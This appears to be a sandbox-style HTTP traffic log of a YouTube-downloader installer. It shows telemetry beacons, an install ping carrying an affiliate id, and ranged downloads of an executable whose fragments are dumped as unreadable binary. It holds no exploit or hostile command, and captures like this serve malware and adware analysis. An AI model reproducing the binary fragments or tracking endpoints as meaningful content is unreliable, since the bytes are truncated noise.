
Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Xtj9ESPhmRhvourGAUMfhhDi66vsGSmoiERpazW7FrxKUqWNVqZOqtSRcuVOtSfx

x-amz-request-id: 1F6B7E69A00AFE10

Date: Sat, 01 Aug 2015 04:17:58 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: J RiUCIv9UbGV9QKdBiA1PfPhwTTiRDzvNjF ZNLKLreDb7jkNeS NgiL9p1Y8y7

x-amz-request-id: 75D69D298E0C021E

Date: Sat, 01 Aug 2015 04:17:58 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: TB4UIlZFQJklwAbk3hnXyCdvereoU/VJ/UcM4D25xdRGw  40yOIHU0zI ulXrF6

x-amz-request-id: 5AB4E82C8B913783

Date: Sat, 01 Aug 2015 04:17:58 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: TB4UIl
ZFQJklwAbk3hnXyCdvereoU/VJ/UcM4D25xdRGw  40yOIHU0zI ulXrF6..x-amz-requ
est-id: 5AB4E82C8B913783..Date: Sat, 01 Aug 2015 04:17:58 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: YoWvw jcpSZmxcpT84VXuZxQmY3rmxfG1VQOydNZQIp1hPRR5o2KffknMhO33Bek

x-amz-request-id: 496E6ACCB795167E

Date: Sat, 01 Aug 2015 04:17:59 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: YoWvw 
jcpSZmxcpT84VXuZxQmY3rmxfG1VQOydNZQIp1hPRR5o2KffknMhO33Bek..x-amz-requ
est-id: 496E6ACCB795167E..Date: Sat, 01 Aug 2015 04:17:59 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: COv52cSnaP33B4ZbuFKw4/DGCAwGwtoSJRu/E/WKOryd5h54JRJgu6mXhEFhL44a

x-amz-request-id: 106700D46806931E

Date: Sat, 01 Aug 2015 04:17:59 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: COv52c
SnaP33B4ZbuFKw4/DGCAwGwtoSJRu/E/WKOryd5h54JRJgu6mXhEFhL44a..x-amz-requ
est-id: 106700D46806931E..Date: Sat, 01 Aug 2015 04:17:59 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..

GET /app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&rnd=27944&v=1.0.8654.1177&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: VVV.ytdownloader.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 0

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 01 Aug 2015 04:17:39 GMT

HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 0..Server: Mi
crosoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..D
ate: Sat, 01 Aug 2015 04:17:39 GMT..

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: MISS

Content-Range: bytes 250000-499999/7202374
.7.6...._.Ko.!..Z....Q...K...J.6#.%.............u.*.'...5.........5..[
.T...l.C1 [email protected]...^".'.0A.....:....9....._.rn....D.d.C.....4p..6.e.
.#r./.....(...0...=...J.....2...6~*..W&@9..:.7<w..l..9.LUC..mv./.T.
.z.xtP..............y..#..bgZ.}...=.D..zJ...O..E...,u$5.A....r..@(....
dS..6g.~..I.:.y[B3S7.I-1..yO...@......=........5.l..;6. ..=c.....5O...
..i....c.....4.P..!(rV-No.....k.G.i.4...|......2.\f.....~U:%:*...M.Y..
.....g...|.!.pt..P....$...V.Sl.U..#..q..}.8@.#..F..3'..oj!.......wI...
E .8[.W..(.h.x...`=Bm..n $F.....1ER....N.%......I..]U<......dw. ...
...j..N... ..L./BC.../EHX&....@|x.......fw...........u....../8.}...5..
S3?....3x.%.._9.(..C.5..eq........n.\..K,.`....X.....OLA4...>-...j.
=..GX&.$.R.U.-....`..|.P.....N4 .o{.x.V.S......T.Iw_..!....G6.4.I.5..X
..M.i..1./..U.n.}....t ....)...UJ...!..D]..M.v....joT......g..T..O.)..
...v2.zV.IT....[S..~..4,.2].........Qy.c.QTqCZ-.CO...w..-..0.?..Ng.R.5
...~..........gf.U. ]..O...!_.c2..*Sl...l..6TL.0^.k.~I.A."Z./nK.......
7.......`%..s.V.D....[..s3..T;......x.N.`[email protected].....
P.*..."..w..Vd~8..i...=..g..4.>,.<&...E.2.F........[..;..l...}..
.J...|.r..v.^..I.zi..0u..`.~h2.....d.`....w...an.......2...4..}..n..G.
.;*..N..g.,..3$=l.8- .....X...l....@*.#w.BFY........NY...E..F......*..
....O..04.......MT......e<......r..........eowH.hC.Z..#........f ..
..|.T...5..-....*.4...}J.>y.....T..E1...9...rJwA1`....o.......=V.;i
.'.../....F'.E......R.}..u;..;..uU*To...HZ....8.s.w.-.h.....0.u.S..s..
..j.]hI....zU.NsWAZ....RD..@/.n.........6?&..$.H.Y...N......*.....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 500000-749999/7202374
.`R{O.y?.....Q...Q`...7y..[\>Q.......p.*....M(.T...'7}#..x.....b...
..J.*.^.:.#......Z...qT..F...9......) .O.../..w..g.B#.[.....%....]....
T..G.........rU....P.N.k.......)L....ak...<d....!K..m..H..JqF.W.s..
@.m.rf.1.<...[%...F.jn..J.W...._ sG6..Q '.}...|.:>Z.....4.a.....
Nrw.o.5.........c......z....3.m.lI.......i<6H.a..o........M<[email protected]
[.e...i.....Y..)i?.Y...n}......\/.=.....!P.D...."d.E7C.f..".Lc.......A
..;N...J......#o...~M.....9.yA"O...r. .sv...0..w.....8X......O.."..)..
a.C.#wLp...^~..J.;S.p....3m.%{...{..q.xLXs]g..}ED..!-...%........G..o.
. ..a.x8.d<5...s.f...GTb...5.E..I:9X.....?....t.#0..P).g..jl1......
 ...9..dVaZ.1.".......({.5......'`..'.......Y.ie]2i.m...5\.". yQ.4\...
...4WLF....C.....7.x].......t.(...z^.j....%.WD..R....=...^{.... (....h
....O...`2#......Es/..>.....c...i.u....-PG?a...G...<..c.*.Amp'M'
....&..#.M..9=...,rlW..^;.B....lg-.#..".E2...... W.....J.fu.X.t...X#..
4T............M...b.'.Tky.....XA..7P.vB. ..8...g.D..:.....D&Vo.P....Dx
.UY...3_......M...b&..sFRQ.y...........3........$@.C1.R....0Lq...G%...
....p.....B.n..;.......B. . j..Z9.C...m.0P .......r.{....e..w..38v....
.Z...........=.G...w......G....g]e-...\..L,...i.....LN.9_..sl...lCz..Y
..a..2.......u).'..].T.......|...O....].".c.V.......|.A....[j..|s.-...
F...q...-....%] ..... ../.G.....,.x]....mr...k...6.].#..........K.E..`
.....?...w.%<..3.:.z.. ,....!.P...Q..y.<.........y..g.g..Vt..q..
..Y!Jm.M...M^. ........... 2.........?%>..C....Y.0..yi..T..... :...
.>..S........=Rm....X`0..:..i..w..qls..."....&1..*...b%.....x.i<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1000000-1249999/7202374
...^..y..$..:Q#....-.P_&.f....s..........S..B.5/u&....9......$..:.L..l
....Q.......F.}.#..S..Vv.I..#g...6.....k.X..J......P8..=.i.)...J..IF.,
W...Hy..Z.........!s^....|N.L.x....[..r[..g.L.."Q......}.b....4.(.C.NB
..p....t...z.......p.A.*?.fSC..W....`.c..p..Q.na1...f_...W.Eo.Z.#e._..
~U.6RcH....L#........f..Wk..~~<....\..d...u..t6N.....N..c.f,E......
I......!D.._....Wz.V9PC.....A9.B..T.k......1.".x0;IcqO...d.;...z{..,CL
-SC...uuf[.A".F....l.?.c........5.#......>^@.m.L....4Wgn.o..vi.]..d
...&,....<l..K.b.Z.bHR.......q.ZT....}.{=X..c... ....|.?........[V.
].<..I%X.}...^.....gH&.|^_cv.....u....L...........C1.k@.!...T......
r.....F.....K2..7...S...a.....a........r.`,>.....`...sS.O....X....?
[email protected]....~?..j{..qNj,8.*.....$M
(..^....c...Y..XI.....2..X...#..%r{,....nt...=u..........~..:.}....04}
..d....iK...H.a.......B.P.[.`j.._.li..L}.......WW^f..._N..)..",.\..J..
...N.D....pc.....:.e..jj.....NW.Tut.%.....S.8b....i.P........3.a4....C
..............X.o.$.. .Y....Rt^>..'e..;B...,......zH.....3.Z..=....
.4.2B..j.z...S.....y..-...P,.9.l.$.....)....P.%.aqC.TH...G..\..@t,.Bcv
...i.'..E..........'N.Ce....C...[{.........h..5r.4]........"T.|.km.WUY
v....p{r....q:'.r.........H.I.<za.rN..6^.eqK.#..k7...K.95OP...:.p.2
.=7=.b.=][[email protected]..,....D.......U.......S)...s.d.s.c..i%...&.....vp:..
...... h.......(..o...]q.[.$N.... h'..x...}..._Xy.E...YM.Jk|@.).S.....
[email protected].<$e0k...:#2.....]q.:....?0.%jV...R..5o.......k.%.
.|..6.......D}.5..h.*12..1....*#/ ...K-.]j{d[....}.W. .....@ &...0<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1250000-1499999/7202374
.......Fl..LF.-(.=......="...K.RP.=A}.).#.K..re6.....!..!....u .....f.
..L.=Y.R...%yw..@.`.A......Z.%N.4.7..<u....4.........`.......Y...`r
..h...e.....4...oq..Q.5.k.W.y..Lg..IgL.[........w..f....(f....~. [....
J8.......>..x,Kx.i...s._....k).....N..U..n9........./=2.ha.....e(?.
4Z....CH..&...x\F..0#g.6.93S..&...S(...uG....(f~A.Z..)Yi...%[email protected]!..@.
..}...5..."..'..M......J./\W.^....2..d.z...3..`&~H\:r....b....ia...?-_
.F.[ee8.z.%...:..x*..{.t....Q?\.eEj...uV...:.. ^|s.....7.s........w.YG
.C.......Nx....b.....o..J....5T.....#c..-..'...z...'.h......<v.!...
...!......DaC.. .........M\Kw.v.9Q.V*.n.E.19.s........o}F.."a...... .O
<9C.m?r...WQ.....IqCg.......l...$.N:'..Tq(3v)2..{..,...]..{> ...
j...0.a.....R.k..%^......4...*4.f..;.....).k...........S...(.......E..
..u-w.!9...vr.pws.8....W.P.e.A.1.Ea..q..R=~.f..t.(.R...)...#^{..#^....
.~..2k..?..x(.....>A.. .Ov..aZ.}.k..........{.....q...L...].B.n.M..
..}p..b.XDJ.I.S-...{....`...k.... I .h...~....q.d..H 2....C.:B..z.....
@U..|_h.. 1t.......[.....`.... .^I.)-..$yj.G.>W.jj.....C..dk.pC9t..
d. &...~IUF.Ba*y?W?..E...._...........h,.\.>5.G........I.$}.).P....
.._..q.....r....vD.-..!..-.....]1...E.!..G.pN.|.G...iw.....:0f......t.
).......l...G........ETS0.....H95. ..U.e)..I>.-.h.1S .-x....1,....A
S.s.........3|Mk.f. .......r.Z.c<Nb..I.h.....2 ..B..I..5...A7<..
....].n...^.x..,.y..X..Tl......0=..AH.y..4.)G..)}.S.2=........7z~.....
,.a=.id./02`..t..,[email protected]..>P.:.T7..P.{[email protected]..
\ab..5oV.:..ZJ.L..^ lr..R...$.<..!...|THz.EN...hW..7.......&j@.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1500000-1749999/7202374
#..A.........S..W..e.........j.u..hS.3..5._O..[.St......ZY.Ul#O.E....a
.........4..h2..........Pi..k...Y.>.y~._.p....... ...!.....DUhX;.. 
 ...z.B........y.....y=@%{.......=...Cyg.N...P"..)..... Fj.~..;....`..
..N....QK~....4' ......r...{.E..)....e......{...:...k.5.[Y.Y...;qA..L.
...I...{..-......i`.....D....z......O.......W{.._.w.96....ZR.Z._.I..(.
......Y8..g.!...cn......3.,.....X.p....}.AJ....1...j......E....=...._.
..NJ....u..l.eU.A....u...J.H.....A.y....Q..D.v|l........~c....3Gi.dx..
.\.I......Lz..U n.,.g..&k.].$oA..b.......J..#JN...l3 ....H..$&@... ...
.|..(...-.:_.9..!).........}.e.#1.#.B.U./..f.e.w...........].F...6...D
.....%..O.p..6.^d. E...$.C.to..oe...GJ{..).....Cc.^o..bK.].!.<mTpEW
.=.......up"W..RE...e.....F...p....n.] o~-,nAk.<...9X.n..ZC..W=....
0.\..6.]..H)..u........Z..W/|......w.[.z.7S..aX....c.Y.h.EH.m..B.r~.w.
3\>./_.......L.~.....".b-.......Ats3.........Y.....W.R..4Y.....2..k
..R1KY),N..9E.....0.G...V... ..7".x....g.;S..7x..x'.%S<...rN.{..r..
.(^. ...a\<.@z.=..."1_...V.l.7....N."......-a[ ...s.:;.(...A.."..RE
|.....lo.j.Gt.SAW......u.s..;f2...#.Z..K.C&p.]...n0.WE.6.e..w.tMM...k.
....]..B.......5?MU..3,g.;.e.]e. -..r.......l..Q...N.K^..E...KQ#O....4
.....f.....z......hh......U[.G..k1.>........=e)..l..e....GN.C.....D
31!S}]..J'..9..<{;...,.....c.H..ub.d..3........k.....o....."w.)V#rl
".-N{"...}2H....a.K...~.o...%....kt..mS.l..WB....0..eia.....Y..1..v.t.
$<...........?.n......s....U..v.F....]...")....5..J[.$....DU.DL.7$.
6.?j...w..-.|Ov6..........U!Mk.N...'!K..g...0>a...l....u.......<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1750000-1999999/7202374
....K.kH..a..t..0.X..DO..u..M ..mz..z....T~x.2*<.....&n...g.j...i,.
.R.MS\.....g..S..b..T.8...@....]~.....GS.v[C....D.|.*...'[....a...R.m.
,J<.... ..6ys ...;..8.F2.A..C...S..RS.....B .o.z....d]T..SE.q..e...
=n.R...ZV. &`V..|..SP........^........OdJ...e.{n^....1...z}.......>
{E....l....k^.....X.........=~.......n...yf.K..:..%.......... ".i.F...
.....B.(..*;Y......=f..f...F....... .....?.Z...&('MT.I..?/;[email protected]
6#....O...'...R..B.Hw.......J..,...~..s..?..^A.fU.....d....\..z.....R.
.n.4I..2P...G..}.(7)p.M.....&E.y]...za..1D....H...v.{.:./.H.R....F...2
....}.....Z. .j..* .....\..|........4h................D.._A....=...D..
[email protected]............%....b.F..7T.O...U.}2es.....s
......*..(...ci.N.4....f.En...TfG...%.t...e....gT....A8..".R.2......&l
t;.5..@}M.~a,.....r....2...%.......N.....g...2F..9g.2Qt..~-... ....T..
PF$.rp.t....N...Hi..#js......e.X.G..rD...`.R.....:.}R4@..',W..|...ri..
.O.?.{..g..F..k.?1.Y. ..`.%T..HB...&..a.1.[[email protected].>.....E
...v.....Y..........Dk.i.o.(.~'8..gn.....k.\y..<Z......0..t.Mo....&
gt;&5.......}.H..1.'.....l........U.v.\..Y...UO.TA....................
.s.7.:..._..t..>...z..PzZ.?Iu.....%..v".CW:.g/9.G..)d\U.i.Na.Rs....
:...G:.?B..WB...."..B9d._.9:U.u-hnB..Wj......JV2...{{YK......T.......)
.`JF.....z..._.e.K.s...o>.....kO........^...gd.tOX..?...Hw.o..E.'.H
...3 ylO.e.7.H.&...T.....<Z.....m.#.......O...3.D[.7.:..o&....yaP..
...w.......Zq\..i.,[email protected]/M...{ .N.FC\.. ..,
n......(.p....D...~/...z%.(...q.f..~.V......b.Q.fi....2.....1D.a..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2000000-2249999/7202374
{.).._..K...MZ...D <.....93......ca......a..nt.....nJ6!a......)..O&
gt;....pk:.y..r.a....a...L......m.F...=......m$..`>.?..f..B..M.b..y
.....Ldf.V6Z7.v.N..([........k.P.|......T._........al.u....x&...E....g
L.b./...'...7hR..1!(.S.n^..U...<.Y...R.!..,Z.A....y........."..j...
.uJ...zA...M..*...y..B'.O....t$ .......G...B....HY.1?..<......q?]h.
..O..Z^...]...I..,.<..>.......JK".0..v;8...:......?.i.....J..~&g
t;#.x.=....;O...n..:1...'.8.^.c8.t.......V..LU..P.r.p'.-7.G#...#.B....
.I.Z..y,.....%.X..c......N..wm..j9.&.,VS|.(r.y.,..0l....F....c=..J....
[email protected]...'.=|.(."...... (.}^'.qdCw.OV6/Y..(&^t..,....W............i.@
..j.......9.F...uX.$J.9.5...w.m.......c4K..~.2..Q..Q........K....i....
..&H......Fs`.'O.LnB.G2wd.P...*....n9.N...s?..H......)..n9.$...f......
../.....B......ku.UL...6.......)..v.E....\.H...J-{-o.C.%....N....K.1Z.
N.a ..O.PZ...!...y-/z.d f........y^.[..JZ.w..*wz...kY.a...pW.......b..
8..R..o.W.......7v.BdbF...aQV...:.\...=}..H.z...Cy.U..*.$K.....^.._.;.
)7..zh4}...|D.........^....N........}...Ol.9.FU@x%#..`c..w.E..^9......
7.7.......c..6^X0..D......M.i7...t`U-..&..\_BsRh.5.4.h...A\iH.j.}S....
..>....?..... ...Y?f..Y........l.......8.0y]d.x.;.q4c...FiVKj.w.*..
., i...%.Y.E...;./..=$...ul.O.=`...........B....G%.k...YQ..&)... .W.i.
 :a..'. .Z5..^c.......f..V._.Xij{.Z.I...7.P.4...y0.1.....2..W."..r.".b
...#.u..M(............;.%...].0..TB.....F.)...2;.i.....z8.....A...;..{
n....Z*y*....k...?...AF.....v.....%.XQ.D_4P>"F...t@....<L..qb...
.'M5.6.t.!...).%.......T.k.E*.y8QH.ns.n..-.y...z...U..C.|=Q.n.'...<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2250000-2499999/7202374
lB..!.~.....x.A...ZK.o...y..e.2l#.S........a.. .6..6.....y.|..........
9.... 0?E..m-..&er.....`.z-.......A.*7..u.....5.4...U......f..]..N..c.
YL..*#.G....rm.)...V8...a=..r.uK...x......|.p.....A05..N....Cf...gJ0..
P7. .r......SA..>..>..L...\......t.~...m.r..27.QJ..G.5z........;
...Ik...s4....6...y.o.....69....d1..D..-X..q.n.-.tun....w..m<.M.'mY
...._..z.4....,K..... ..x...m......a.&..(..gp..{...Dij...Sj.s..-.8..A.
&.0......G.PC.q1o.w..D.}ii6...;zpa =.....5t-.5..m.a.u..Z...G...V.....c
..J..n\V#.'.....@...?..]....}.*.3.g..C.}..|("g%.).... ..R.x......h...M
.....o.....q..,.....Mjo0...{.G..b..f#..Jy. ....\S...."S}...~..zj....7.
S.(-....5.3..............dp..p....fA.....*..7....&.H....i..(..l.V.....
b@.#....I.z..4X"{Z..(.~.V.E9.3.....R..} .s*...g9.......W$|.2.....c...$
t.......B.YH.|$...[9k...../zR..\.cF<Z.dD..^o....,.mSs(.?...0.4.....
...C.c..H...W.0.us<.......;\...........0..> .k2...Y.g.n....t%y. 
HK...Q.q98.....#....Ol..S...hF...Z.lS........r.....G?>..`...y..g,..
X!|j<#B.....^&...6............(sv..$\.P?.s.D......*.......J.w.N.G..
^u..(.....k.Y..w.l]..............}....R.xd.......x@...&....BZP....Kmn 
...G...6....(.l.r.M4.....wq&.....S...`.Mab.]..\..{.......E.C.....s.]=G
6$..f...S$."...G..,.....[...n7.Y........D.&.e'.6.... YB....W...a....KM
..d.)V?.....NA.H$o...W..-...i.(..O...P.)V..e`(..r....y.{...G..l\&z[...
Z.S.y..J..TH..M...U..w.....W.......:w7.Sc.R........%....@Q ...P=D...}{
.......!..".0..<......55...2..)......!...ta&'4A.y{.....w.....-..?..
.8.4..y._3..R.....L#. *......8$..ztV....N8.5.M..D.(.>.G.....I.{<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2500000-2749999/7202374
..X.6!!.q.G.8...b.%)qY7...m...t.X.<,..'../..@M.\..c..}......O......
..f..0.5.[.Lf.(..8"."\........[.....Y.!..x.W4.O..o....7...NZ.T.w.u.3te
.w...v..$..'.R3..w.F|. ...R.0...d.B:.b.a..I.jX&...t...U.....v......O..
/...8......`..#Sz.8....`..7o ....Sa.p5O\.(..I.@.(M..f.K.n..R>..>
..J........B...@XU..!.. U./=S..B.7]........wv..........K..U...ZI...X9C
0.....:Z.h.(..A...u......X}}...`.....|.~. .:.6t..',1... A..N....u.."..
n...f.b>.s;.o....O=...4..&.YB...g.....d3.....r..[N......R.j.5.:1u..
.....'....suh....~.........6o....#...i.....yN.?&.e..m.-p..8..#.UM..]..
